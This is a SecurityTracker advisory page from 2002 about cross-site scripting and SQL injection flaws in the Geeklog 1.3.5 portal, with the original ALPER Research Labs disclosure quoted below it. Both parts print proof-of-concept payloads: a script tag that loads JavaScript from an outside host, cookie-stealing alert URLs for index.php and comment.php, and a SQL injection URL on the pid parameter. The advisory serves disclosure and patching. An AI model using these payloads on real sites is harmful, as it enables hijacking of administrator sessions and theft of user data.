SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Geeklog Vendors:   Geeklog
Geeklog Web Portal Software Permits Cross-Site Scripting Attacks and May Allow Remote Users to Execute Arbitrary SQL Commands on the Database Server
SecurityTracker Alert ID:  1004499
SecurityTracker URL:  http://securitytracker.com/id/1004499
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 10 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.3.5, 1.3.5rc1, and prior versions
Description:   Several vulnerabilities have been reported in the Geeklog web portal software. A remote user may be able to inject SQL commands to be executed by the underlying database server. Also, a remote user can conduct cross-site scripting attacks.

ALPER Research Labs reported that the user-supplied '$url' variable submitted for administrator review with a new Calendar Event is not filtered. A remote user can submit HTML containing malcious scripting code in this variable to cause the arbitrary scripting code to be executed by the administrator's web browser. This code will appear to originate from the Geeklog site and will run in the security context of that site. As a result, the scripting code will be able to access the administrator's cookies associated with the site.

A demonstration exploit value is provided:

<script src="http://forum.olympos.org/f.js">Alper</script>

Also, a remote user can create a malicious link using the 'index.php' or 'comment.php' scripts to cause a similar cross-site scripting condition. The following demonstration exploit URLs are provided:

/index.php?topic=<script>alert(document.cookie)</script>

/comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article

Finally, it is reported that the '$pid' variable is directly passed to the underlying SQL server. This allows a remote user to create a URL that will inject SQL commands to be executed by the database server. A demonstration exploit URL is provided:

/comment.php?mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

According to the report, the "Magic Quotes" function of PHP will escape the quoting characters, possibly reducing the impact of this flaw. However, if the "Magic Quotes" feature is not enabled, a remote user could cause arbitrary SQL commands to be executed. This could allow a remote user to obtain all available information about Geeklog users from the database.

Impact:   A remote user could cause arbitrary scripting code to be executed on a Geeklog user's or administrator's browser to steal their authentication cookies.

A remote user could inject arbitrary SQL commands to obtain information about Geeklog users from the database.

Solution:   The vendor has released a fixed version (1.3.5sr1), available at:

http://prdownloads.sourceforge.net/geeklog/geeklog-1.3.5sr1.tar.gz

You can read more about this issue at:

http://geeklog.sourceforge.net/article.php?story=20020610013358149

Vendor URL:  geeklog.sourceforge.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [ARL02-A13] Multiple Security Issues in GeekLog




+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\-------  Security Advisory  -----/---------/+
+/----------\------    ID: ARL02-A13    ----/----------/+
+/-----------\----- salper@olympos.org  ---/-----------/+


Advisory Information
--------------------
Name               : Multiple Security Issues in GeekLog
Software Package   : GeekLog
Vendor Homepage    : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 31/05/2002
Vendor Replied     : 01/06/2002
Prior Problems     : N/A
Current Version    : v1.3.5rc1 (vulnerable)


Summary
-------
GeekLog is a web content management system suitable for 
running full-featured community sites. It supports article 
posting, threaded comments, event scheduling, and link 
management and is built around a design philosophy that 
emphasizes ease of use.

I have found these issues while testing the GeekLog system 
which was to be used at http://www.olympos.org, "Olympos 
Turkish Security Portal".
2 different types of Cross Site Scripting issues, plus 
1 SQL Injection vulnerability was found in GeekLog.


Details
-------
1. When any user sends a new Calender Event, the form is submitted 
to the site admin for approval. The $url variable, which holds the 
data given in the "Link" section of the form, is not filtered for 
malicious code. So a malicious user may get the cookie of the site 
administrator and therefore "own" the site.
Also this issue may be exploited to run malicious code on the GeekLog 
site.
Proof-of-concept Link input ($url):
<script src="http://forum.olympos.org/f.js">Alper</script>

2. Maliciously crafted links from third party sites may allow Cross 
Site Scripting attacks via "index.php" and/or "comment.php". 
Two examples for this;
/index.php?topic=<script>alert(document.cookie)</script>
/comment.php?mode=display&sid=foo&pid=18&title=<script>alert
(document.cookie)</script>&type=article

3. The $pid variable is directly passed to SQL input. This makes it 
possible for attackers to launch SQL injection attacks.
/comment.php?
mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

As the "Magic Quotes" function of PHP escapes the quoting characters, 
this third issue might just cause "light" headaches, but if the "Magic 
Quotes" is not active, the attacker may be able to get all the information 
about users from the SQL tables.


Solution
--------
The vendor replied and acted quickly.
A patch or a new version pointing this issue will
soon be available via CVS or a FTP download from:
http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net

The development team of GeekLog said that; they will 
be cleaning out the code for similar security issues, 
which were mentioned above.


Credits
-------
Discovered on 31, May, 2002 by 
Ahmet Sabri ALPER <salper@olympos.org>
ALPER Research Labs.

The ALPER Research Labs. [ARL] workers are freelancer 
security professionals and WhiteHat hackers. The ARL 
workers are available for hiring for legal jobs.
The ARL also supports Open Software Community, by detecting 
possible security issues in GPL or any other Public Licensed 
product.


References
----------
Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC